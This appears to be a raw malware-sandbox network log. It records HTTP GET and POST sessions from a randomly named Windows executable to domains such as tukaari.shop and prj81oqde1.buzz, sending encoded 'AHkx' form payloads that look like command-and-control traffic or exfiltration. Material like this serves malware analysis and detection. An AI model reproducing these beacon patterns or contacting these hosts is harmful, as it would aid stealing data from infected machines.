                                                                                                                    Data Ascii: AHkx=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uFM4KB92F0BdpwUiwgDv+6789Q/VvvTFlcBuOCtzOgfDVmM2IQ91VIJtRXZoBtCZgGMCP3FxEPMsAti9AS5x0EVOvrvZLPigtVZIdbBm+fJJmlaw3LMMODuhVcD4vUkwCKfHm4YhGPc4OaHTEd5iYJ2aJVSKDUJLWvx2cIKMBS0f4sLMpcBv3tRHmL5rkTx1NHf0DF+NY4gfIkf9wWiBm4tWMJ557f52jbxBLAdqFFb8W+aY8RMYbkRYYganUvGLStHUrXOAf3atVciADLdQ0ivLgjC1J/Q/qCZ8D3NVuK5udUSwVcvC0d3aIMM8RddJhHkifPKz8ENbWM3wfNc3ZBmLZ+J2mHvUn7dXBnZoaw+eTWTWsg9uBGlQMPuxKpWrhZBkbVvqeFbErKfyLuxanBzG6L9T6Ru6WvAw18zF40bTqkCYznpXXF24mttb4jBqgcHV8OHF532YwyEKSqkOPPw6KfcRlw4c03hduaGRQjGzHXknROI9lky1p5Q9n7RIdymieCl2ulu6YprXUEouayP7/TRge8c0Pc4bqt12dQFnTIuT7vQ2fSzDhhZAvdxY1GsQi7Bc7cyq0v17qhs+MKeK/2zuLUa6/kbdfRFKrlDdCwWEXyqMy6CE7/qOgzqOD0/vFpXhDMIhbcPyY6KzTznog4dDvf1QRmGYQoHDwjVhbgI/wyPAJRL2ePGI2UHamadVi1/PmW5oSuPJaacQE+P3puqguASYO95rJ8uM3+aTsKWCPTwoYPnEcoDcJ7mP43ltWv7Ofh1al/DHn3M7HK38lrk/KhF9UAxLy1ydTQrE6ZZevLkmtSAHzgpMukV+lWGXh2E5t9Zrs0v4MJD6Ivx1ZB2/gTPNkZoM2Zm2hAtcLO/iKFqCIu9eC8EWmIQw3LqVgyp9qpZsjPcso3h1Z0YWyEqQC12f4vZO+K8k8IQUon8G0o6+VjhdzsQ9NWNtfNfIdG [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:20:35.111148119 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.44963938.47.232.196803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:36.716541052 CEST459OUTGET /ak5l/?rf-LZ=JlCtuN3HqPO8C&AHkx=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:37.626393080 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.4496403.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:42.678286076 CEST719OUTPOST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 69 77 37 2f 64 63 70 65 66 53 6f 75 33 71 36 32 56 44 65 44 4d 30 4a 31 4b 76 6c 33 64 47 78 71 50 4b 4d 61 61 4c 38 36 6b 2f 51 51 63 34 66 39 6a 4a 75 61 44 6e 46 35 41 78 65 76 67 6c 72 52 76 63 56 51 6e 47 55 2b 6a 66 33 42 4f 36 49 70 58 35 57 57 51 4f 2b 30 2f 67 72 39 39 5a 70 70 6e 4b 4d 41 45 7a 56 4e 67 4f 4e 71 33 4d 37 61 50 4e 74 44 36 59 6e 61 66 31 5a 5a 36 36 4d 49 70 78 45 62 7a 4b 37 45 42 61 73 73 34 51 6d 43 4a 76 6c 63 6f 55 4c 56 48 4d 4e 61 46 51 69 73 4b 71 7a 41 4b 79 44 66 6c 57 42 47 42 45 51 62 64 6c 7a 44 51 3d 3d
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3iw7/dcpefSou3q62VDeDM0J1Kvl3dGxqPKMaaL86k/QQc4f9jJuaDnF5AxevglrRvcVQnGU+jf3BO6IpX5WWQO+0/gr99ZppnKMAEzVNgONq3M7aPNtD6Ynaf1ZZ66MIpxEbzK7EBass4QmCJvlcoULVHMNaFQisKqzAKyDflWBGBEQbdlzDQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.4496413.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:45.223704100 CEST739OUTPOST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 69 78 70 75 36 4d 64 62 4c 38 76 6b 2f 51 62 38 35 62 35 6a 49 69 61 44 36 6c 35 42 39 65 76 6d 4a 72 52 74 45 56 52 51 36 56 2f 7a 66 31 59 2b 36 4b 30 48 35 57 57 51 4f 2b 30 2f 30 46 39 39 42 70 75 58 36 4d 42 6c 7a 53 52 51 4f 43 38 48 4d 37 4d 2f 4e 68 44 36 59 4a 61 65 70 7a 5a 34 79 4d 49 73 31 45 61 6e 57 34 64 78 61 75 6f 34 52 44 43 70 75 70 51 71 39 6d 4c 56 68 72 59 78 67 76 74 4d 37 70 52 37 54 55 4e 6c 79 79 62 47 4e 6b 57 65 59 36 59 5a 6e 35 71 61 78 4f 2f 71 52 54 74 44 39 43 63 56 65 44 50 4f 59 3d
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vixpu6MdbL8vk/Qb85b5jIiaD6l5B9evmJrRtEVRQ6V/zf1Y+6K0H5WWQO+0/0F99BpuX6MBlzSRQOC8HM7M/NhD6YJaepzZ4yMIs1EanW4dxauo4RDCpupQq9mLVhrYxgvtM7pR7TUNlyybGNkWeY6YZn5qaxO/qRTtD9CcVeDPOY=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.4496423.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:47.767743111 CEST10821OUTPOST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 71 78 71 59 75 4d 62 35 6a 38 70 55 2f 51 59 38 35 59 35 6a 49 76 61 44 69 70 35 42 67 38 76 6c 39 72 44 65 4d 56 59 42 36 56 32 7a 66 31 46 4f 36 50 70 58 35 35 57 51 65 69 30 2f 6b 46 39 39 42 70 75 55 69 4d 49 55 7a 53 43 41 4f 4e 71 33 4d 33 61 50 4e 4e 44 36 41 2f 61 65 64 4a 5a 49 53 4d 49 4d 6c 45 64 55 2b 34 55 78 61 67 76 34 52 68 43 70 6a 72 51 71 68 45 4c 52 67 4f 59 32 51 76 75 5a 53 4d 4a 61 54 38 55 30 65 70 4e 6b 6c 6d 51 75 4d 73 5a 70 62 74 6d 6f 46 55 6b 37 42 41 72 68 42 4c 59 77 4b 77 4e 4c 6d 52 33 49 32 6a 79 79 47 78 50 63 55 4a 36 59 59 66 39 35 67 45 44 49 79 64 73 57 46 37 63 70 30 2f 4b 4f 4d 54 72 7a 55 48 76 57 50 71 47 78 48 33 57 72 2b 4f 65 76 41 45 41 6e 4c 7a 34 6a 76 30 73 2b 7a 53 75 4d 6d 6a 49 50 6e 58 4b 56 6f 65 43 2f 75 37 49 64 59 55 6b 74 33 31 6b 39 46 4a 49 50 42 6e 2f 57 62 67 51 64 78 74 44 6e 71 32 2b 67 59 4b 30 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vqxqYuMb5j8pU/QY85Y5jIvaDip5Bg8vl9rDeMVYB6V2zf1FO6PpX55WQei0/kF99BpuUiMIUzSCAONq3M3aPNND6A/aedJZISMIMlEdU+4Uxagv4RhCpjrQqhELRgOY2QvuZSMJaT8U0epNklmQuMsZpbtmoFUk7BArhBLYwKwNLmR3I2jyyGxPcUJ6YYf95gEDIydsWF7cp0/KOMTrzUHvWPqGxH3Wr+OevAEAnLz4jv0s+zSuMmjIPnXKVoeC/u7IdYUkt31k9FJIPBn/WbgQdxtDnq2+gYK06o8Dhcea13Bph9jISQua+/9/8tQGFcdyu24qbevxLkeupA8ztC3oX1Vj+nDse7hU84Vjwu5Lm6V25qECS5OwJY8M/Nh7A3bqsYzhpKtW81l6MoJJzwlb7fme4FbS9XsCT7ndgySHe43UiU8VgsdbBtbh5Og14AL0sWRrgn9Lx7EjrcBORHaKgdcetsMHLy3zxlNt98rB753SKKyGZDRtb+z1GhsEmMRR4lphERVwPVDKoxGi4R6bYBQP6w1G0mYj5fdGCKndw9WmN6vJQxrANya5Wrco5kcf22WZxv8r+3eiNX+4LOovKohPg4cS+K6qoSqDfNIFwA2CQlwzdP0b/5hVsF7YcYxTYapu6/lmuER2Et65eXXFWBfQMUHeCrpKIVexlZ9rYg9LmDWZKr6GvjRbWGTfGrBGKv31OcOncNYhHg6HwP+/aZifWAIzJQIFWxxZjGiJNrlENskmJ1mkc4iFkrjV7jQ5e5oUcf0mj79UkCDABzX3v8Eee4RO/q7K7P7HyHy1SbOsK1GYbSe/3bKDLq/fkaEc5QfVOtJsyg0igdSxxQPT+16bswI1LEgaBnhp6nGPJ24WqL5XCShlN1+bo2XrdV9xxfwolTgFPRlZoGIiLGEnztAmxYTTGG+ewS/XFO/h0GhguHM134Wef7hxlVwWujTL4s [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.4496433.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:50.311779976 CEST462OUTGET /b8ih/?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:51.716342926 CEST400INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:51 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 260
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 48 6b 78 3d 4f 64 7a 34 2b 46 6f 61 65 49 67 48 35 53 38 43 39 4f 59 5a 51 63 33 6f 75 57 65 5a 78 54 44 45 65 73 41 56 39 64 44 41 78 38 75 61 78 38 65 49 56 39 6e 6c 36 67 76 2b 4e 71 68 66 37 47 78 6a 4d 48 75 71 33 57 52 46 2f 48 39 79 65 63 55 41 62 54 44 38 33 47 50 55 47 4e 57 76 30 31 30 4a 56 46 32 39 79 63 77 70 73 4e 4e 55 6e 47 57 4a 4e 58 72 45 42 46 45 3d 26 72 66 2d 4c 5a 3d 4a 6c 43 74 75 4e 33 48 71 50 4f 38 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.449644154.212.219.2803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:57.223153114 CEST728OUTPOST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 30 55 77 69 76 38 39 75 68 6c 4d 45 74 58 4f 75 59 4e 76 52 42 4b 6d 47 4c 53 45 6e 4e 48 76 47 2b 61 78 36 51 59 76 72 54 32 33 36 42 78 65 43 33 52 6d 64 65 71 42 75 32 53 44 57 4e 70 65 70 4e 2b 75 46 75 51 45 7a 63 42 4f 78 75 48 6e 59 30 57 44 51 77 7a 77 39 44 49 61 66 73 6c 36 73 46 6c 4d 6a 42 48 6d 51 61 77 41 43 37 6d 66 39 4b 38 41 69 6d 38 6b 50 77 78 6e 5a 79 42 57 4c 4d 30 4f 45 51 58 38 78 51 65 2b 2f 53 79 42 4d 6a 69 55 74 42 5a 72 39 4d 6e 46 52 6f 79 5a 4e 34 50 53 4f 49 67 77 4f 50 4e 50 54 53 66 33 76 6d 77 67 65 64 77 3d 3d
                                                                                                                    Data Ascii: AHkx=h/ionbQWjbvi0Uwiv89uhlMEtXOuYNvRBKmGLSEnNHvG+ax6QYvrT236BxeC3RmdeqBu2SDWNpepN+uFuQEzcBOxuHnY0WDQwzw9DIafsl6sFlMjBHmQawAC7mf9K8Aim8kPwxnZyBWLM0OEQX8xQe+/SyBMjiUtBZr9MnFRoyZN4PSOIgwOPNPTSf3vmwgedw==
                                                                                                                    Oct 9, 2024 14:20:58.129436016 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.449645154.212.219.2803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:59.772252083 CEST748OUTPOST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 79 33 47 2f 36 68 36 52 61 4c 72 51 32 33 36 4b 52 65 44 34 78 6d 44 65 72 38 62 32 51 58 57 4e 71 69 70 4e 38 32 46 76 6e 59 77 64 52 4f 2f 69 6e 6e 61 70 47 44 51 77 7a 77 39 44 49 4f 35 73 6c 53 73 46 51 45 6a 41 69 4b 58 47 41 41 42 2b 6d 66 39 4f 38 41 63 6d 38 6c 59 77 30 4f 38 79 43 75 4c 4d 32 47 45 54 47 38 79 4c 4f 2b 31 50 69 41 6f 72 69 5a 4a 44 70 75 38 45 6c 5a 39 32 41 68 4d 35 4a 44 55 5a 52 52 5a 64 4e 72 67 50 59 2b 62 72 7a 64 58 47 36 55 51 79 6e 38 49 53 33 71 62 48 36 58 45 74 32 32 39 51 58 41 3d
                                                                                                                    Data Ascii: AHkx=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83Ky3G/6h6RaLrQ236KReD4xmDer8b2QXWNqipN82FvnYwdRO/innapGDQwzw9DIO5slSsFQEjAiKXGAAB+mf9O8Acm8lYw0O8yCuLM2GETG8yLO+1PiAoriZJDpu8ElZ92AhM5JDUZRRZdNrgPY+brzdXG6UQyn8IS3qbH6XEt229QXA=
                                                                                                                    Oct 9, 2024 14:21:00.661510944 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.449646154.212.219.2803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:02.316055059 CEST10830OUTPOST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 78 58 47 2f 4d 74 36 51 37 4c 72 52 32 33 36 48 78 65 47 34 78 6e 47 65 72 6b 66 32 51 72 47 4e 73 6d 70 4d 66 2b 46 6f 53 73 77 55 52 4f 2f 71 48 6e 62 30 57 44 67 77 33 64 32 44 49 65 35 73 6c 53 73 46 52 30 6a 57 48 6d 58 45 41 41 43 37 6d 66 68 4b 38 42 78 6d 38 73 74 77 30 4b 43 79 79 4f 4c 43 32 32 45 57 30 55 79 48 4f 2b 7a 4f 69 41 77 72 69 56 57 44 70 79 4b 45 6b 74 54 32 44 39 4d 37 4d 47 39 4c 6c 51 47 4b 2b 66 4a 53 4c 43 34 76 69 35 46 47 37 49 2f 36 31 59 78 51 33 57 6c 4b 4b 7a 4b 77 54 79 42 4b 44 64 61 51 31 79 32 65 30 47 33 4f 39 78 4f 52 32 67 64 6e 6b 6b 76 48 4b 50 57 55 39 46 52 6e 34 5a 68 79 74 6e 56 31 6a 6f 41 43 31 74 55 43 44 48 2b 73 55 33 46 79 50 74 68 46 44 64 6d 50 69 4e 59 50 38 79 49 78 73 73 38 4d 4c 57 59 31 6f 71 30 45 41 37 7a 79 6e 65 33 73 36 46 59 45 70 75 5a 66 7a 2f 64 4d 72 32 72 77 51 50 72 2b 6a 47 54 54 4e 46 59 4b [TRUNCATED]
